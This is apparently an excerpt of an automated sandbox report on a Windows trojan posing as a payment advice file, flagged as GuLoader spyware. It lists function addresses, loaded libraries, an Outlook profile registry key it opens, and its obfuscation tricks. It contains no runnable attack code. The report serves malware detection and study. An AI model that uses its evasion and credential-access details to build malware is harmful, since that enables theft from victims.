Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE003B 2_2_36CE003B
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE99C8 2_2_36CE99C8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE57C0 2_2_36CE57C0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE25C0 2_2_36CE25C0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE0FD9 2_2_36CE0FD9
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE41E0 2_2_36CE41E0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE0FE0 2_2_36CE0FE0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE5180 2_2_36CE5180
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE1F80 2_2_36CE1F80
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE6DA0 2_2_36CE6DA0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE3BA0 2_2_36CE3BA0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE09A0 2_2_36CE09A0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE4B40 2_2_36CE4B40
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE1940 2_2_36CE1940
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE6750 2_2_36CE6750
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE6760 2_2_36CE6760
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE3560 2_2_36CE3560
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE0360 2_2_36CE0360
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE4500 2_2_36CE4500
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE1300 2_2_36CE1300
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CED700 2_2_36CED700
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE3240 2_2_36CE3240
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE6120 2_2_36CE6120
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CE2F20 2_2_36CE2F20
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF1CF0 2_2_36CF1CF0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF8470 2_2_36CF8470
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFFB30 2_2_36CFFB30
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFD8D0 2_2_36CFD8D0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFA6D0 2_2_36CFA6D0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF1CE0 2_2_36CF1CE0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF04F9 2_2_36CF04F9
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFF4F0 2_2_36CFF4F0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF90F0 2_2_36CF90F0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFC2F0 2_2_36CFC2F0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF0E98 2_2_36CF0E98
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF0E93 2_2_36CF0E93
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFA090 2_2_36CFA090
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFD290 2_2_36CFD290
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFBCB0 2_2_36CFBCB0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF8AB0 2_2_36CF8AB0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFEEB0 2_2_36CFEEB0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF0040 2_2_36CF0040
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF9A50 2_2_36CF9A50
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFCC50 2_2_36CFCC50
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFE861 2_2_36CFE861
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFE870 2_2_36CFE870
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFB670 2_2_36CFB670
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF9410 2_2_36CF9410
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFF810 2_2_36CFF810
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFC610 2_2_36CFC610
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF1828 2_2_36CF1828
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF0028 2_2_36CF0028
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF1821 2_2_36CF1821
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFB030 2_2_36CFB030
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFE230 2_2_36CFE230
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF09CD 2_2_36CF09CD
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFF1D0 2_2_36CFF1D0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF09D0 2_2_36CF09D0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF8DD0 2_2_36CF8DD0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFBFD0 2_2_36CFBFD0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF35E9 2_2_36CF35E9
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFDBF0 2_2_36CFDBF0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFA9F0 2_2_36CFA9F0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFB990 2_2_36CFB990
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF8790 2_2_36CF8790
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFEB90 2_2_36CFEB90
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFA3B0 2_2_36CFA3B0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFD5B0 2_2_36CFD5B0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF1359 2_2_36CF1359
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFE550 2_2_36CFE550
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFB350 2_2_36CFB350
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF1360 2_2_36CF1360
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF9D70 2_2_36CF9D70
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFCF70 2_2_36CFCF70
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF0508 2_2_36CF0508
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFAD10 2_2_36CFAD10
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFDF10 2_2_36CFDF10
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF9730 2_2_36CF9730
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CFC930 2_2_36CFC930
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D336F0 2_2_36D336F0
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D31470 2_2_36D31470
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D33008 2_2_36D33008
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D31B50 2_2_36D31B50
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D347BA 2_2_36D347BA
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D32238 2_2_36D32238
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D30D88 2_2_36D30D88
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D32920 2_2_36D32920
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D336E1 2_2_36D336E1
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D3145F 2_2_36D3145F
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D33003 2_2_36D33003
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D31B41 2_2_36D31B41
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D32227 2_2_36D32227
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D30040 2_2_36D30040
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D30011 2_2_36D30011
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D30D79 2_2_36D30D79
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D30A10 2_2_36D30A10
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D309E1 2_2_36D309E1
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D32911 2_2_36D32911
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_373A5C13 2_2_373A5C13
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_373AB8D1 2_2_373AB8D1
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_373A1B4C 2_2_373A1B4C
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: String function: 00402C41 appears 49 times
Sample file is different than original file name gathered from version info
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201080538.0000000033827000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PayeeAdvice_HK54912_R0038704_37504.exe
Uses 32bit PE files
Source: PayeeAdvice_HK54912_R0038704_37504.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/5@6/5
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0040336C EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 0_2_0040336C
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_004046FF GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW, 0_2_004046FF
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk, 0_2_00402104
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Mutant created: NULL
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File created: C:\Users\user\AppData\Local\Temp\nsd378D.tmp Jump to behavior
Source: PayeeAdvice_HK54912_R0038704_37504.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: PayeeAdvice_HK54912_R0038704_37504.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File read: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process created: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process created: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe" Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: PayeeAdvice_HK54912_R0038704_37504.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.1876669136.000000000439B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1875584401.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 7156, type: MEMORYSTR
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_73401B63 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_73401B63
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_73402FD0 push eax; ret 0_2_73402FFE
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0439FCA9 push FFFFFF8Dh; iretd 0_2_0439FCAD
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0439E2F8 pushfd ; iretd 0_2_0439E2FB
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0439E0D1 push ebx; ret 0_2_0439E0D2
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0439D321 push ds; retf 0_2_0439D328
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0439F31A push edx; iretd 0_2_0439F31B
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0439D7F2 push edx; ret 0_2_0439D7F3
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_00119C30 push esp; retf 0018h 2_2_00119D55
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_0011B4C7 push dword ptr [ebp+ecx-75h]; retf 2_2_0011B4D2
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_0011B539 push dword ptr [ebp+ebx-75h]; iretd 2_2_0011B53D
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_02EF7C7D push esp; iretd 2_2_02EF7CBE
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_02EF3D30 push 00000039h; retf 2_2_02EF3D32
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C4AE29 push ds; ret 2_2_36C4AE2A
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C4AE31 push ds; ret 2_2_36C4AE32
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C4F781 push ecx; ret 2_2_36C4F782
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C4F77D push ecx; ret 2_2_36C4F77E
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C49CD7 push ss; ret 2_2_36C49CDA
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C494E7 push cs; ret 2_2_36C494EA
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C489C0 push es; ret 2_2_36C489C2
